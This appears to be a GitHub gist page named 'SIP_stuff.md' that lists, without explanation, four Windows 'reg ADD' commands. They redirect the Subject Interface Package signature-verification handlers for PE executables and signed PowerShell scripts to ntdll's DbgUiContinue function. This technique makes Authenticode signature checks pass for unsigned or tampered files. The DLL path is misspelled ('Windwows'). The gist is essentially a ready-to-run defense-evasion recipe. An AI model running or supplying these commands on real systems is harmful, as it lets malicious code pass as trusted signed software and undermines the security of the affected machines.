Skip to content

Instantly share code, notes, and snippets.

@vestjoe

vestjoe/SIP_stuff.md

Last active August 31, 2018 15:25
Show Gist options
  • Save vestjoe/446ac9fd315d58a3b174a2f646e0b8fe to your computer and use it in GitHub Desktop.
Save vestjoe/446ac9fd315d58a3b174a2f646e0b8fe to your computer and use it in GitHub Desktop.
Download ZIP
Raw
SIP_stuff.md

Change SIP Signature validation for PE files


reg ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}" /v DLL /t REG_SZ /d C:\Windwows\System32\ntdll.dll /f
reg ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}" /v FuncName /t REG_SZ /d DbgUiContinue /f

Change SIP Signature validation for signed PowerShell scripts

reg ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}" /v DLL /t REG_SZ /d C:\Windwows\System32\ntdll.dll /f
reg ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}" /v FuncName /t REG_SZ /d DbgUiContinue /f
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment